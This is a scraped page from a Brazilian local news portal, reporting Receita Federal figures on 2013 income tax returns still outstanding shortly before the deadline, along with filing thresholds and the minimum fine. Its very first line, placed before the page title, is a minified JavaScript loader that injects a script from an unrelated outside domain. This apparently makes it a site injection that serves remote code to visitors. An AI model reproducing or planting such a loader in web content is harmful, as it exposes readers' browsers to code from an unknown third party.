;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 5,1 milhões ainda não declararam IR faltando um dia para final do prazo, - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

5,1 milhões ainda não declararam IR faltando um dia para final do prazo,

Imposto-de-Renda-2013Cerca de 20% das declarações esperadas ainda não foram entregues.
Prazo para entrega termina nesta terça-feira (30). A Secretaria da Receita Federal informou que recebeu, até as 16h desta segunda-feira (29),  20.952.645 milhões de declarações do Imposto de Renda 2013. O número corresponde a cerca de 80,4% do total de declarações esperadas este ano pelo Fisco.
Ou seja, ainda faltam cerca de 5,1 milhões de declarações (19,6%) para serem recebidas, uma vez que a Receita espera receber mais de 26 milhões de documentos neste ano, um recorde em relação aos anos anteriores.
O prazo começou em 1º de março e termina nesta terça-feira (30).
Pela manhã, balanço do Fisco apontava que 5,9 milhões ainda não tinham enviado a declaração. Dessa forma, só nesta segunda-feira, cerca de 800 mil pessoas a mais entregaram a declaração até esta tarde.
O Fisco alerta para o risco das pessoas deixarem para enviar a declaração nos últimos dias, pois muitos contribuintes podem encontrar dificuldades devido ao acumulo de acessos ao endereço da Receita.
Segundo a Receita Federal, estão obrigadas a apresentar a declaração as pessoas físicas que receberam rendimentos tributáveis superiores a R$ 24.556,65 em 2012 (ano-base para a declaração do IR de 2013). Veja outras situações que obrigam o contribuinte a declarar Imposto de Renda.
Declarar IR pode garantir renda para quem não é obrigado. Especialistas em Imposto de Renda recomendam que os contribuintes separem os documentos necessários para fazer a declaração deste ano, não deixem para entregar o documento na última hora e prestem atenção redobrada na hora do preenchimento – como forma de evitar a chamada malha fina.
Quem perder o prazo estará sujeito à multa mínima de R$ 165,74, limitada a 20% do imposto devido.

Informação: G1

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.